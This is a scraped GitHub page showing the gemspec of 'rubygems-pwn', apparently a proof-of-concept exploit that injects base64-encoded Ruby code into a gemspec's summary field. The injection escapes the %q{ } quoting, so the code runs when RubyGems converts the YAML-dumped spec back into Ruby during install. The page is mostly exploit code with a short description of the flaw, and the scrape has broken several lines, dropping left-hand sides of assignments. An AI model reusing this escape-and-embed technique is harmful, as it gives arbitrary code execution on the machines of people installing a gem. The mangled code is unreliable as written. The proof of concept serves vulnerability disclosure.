Skip to content


Subversion checkout URL

You can clone with
Download ZIP
Branch: master
Fetching contributors…

Cannot retrieve contributors at this time

34 lines (26 sloc) 1.4 KB
# -*- encoding: utf-8 -*-
require 'base64' do |s| = "rubygems-pwn"
s.version = "0.1.1"
s.authors = ["Postmodern"] = [""]
s.homepage = ""
# load the payload
payload =,'lib','rubygems-pwn','payload.rb'))
embed_code = lambda { |code|
# base64 encode our payload, to hide any special characters
escape_code = lambda { |code|
# escape RubyGems Gem::Specification#ruby_code escaping logic which
# simple wraps Strings in "%q{" and "}".
"}; #{code} #"
s.description = %q{A Proof of Concept (PoC) exploit for an trivial Security vulnerability in how RubyGems converts YAML-dumped gemspecs, back into Ruby code, when installing RubyGems. This ties into the larger design mistake, of storing installed gemspecs as Ruby code; since evaling Ruby code was faster than loading YAML gemspecs. When handling data, it is safer to store it in a static format (YAML, XML, CSV), instead of executable code.}
# grab the first sentence of the description, and append our escaped code
s.summary = s.description.match(/^[^\.]+/)[0] +
s.files = ['README.rdoc']
s.require_paths = ["lib"]
Jump to Line
Something went wrong with that request. Please try again.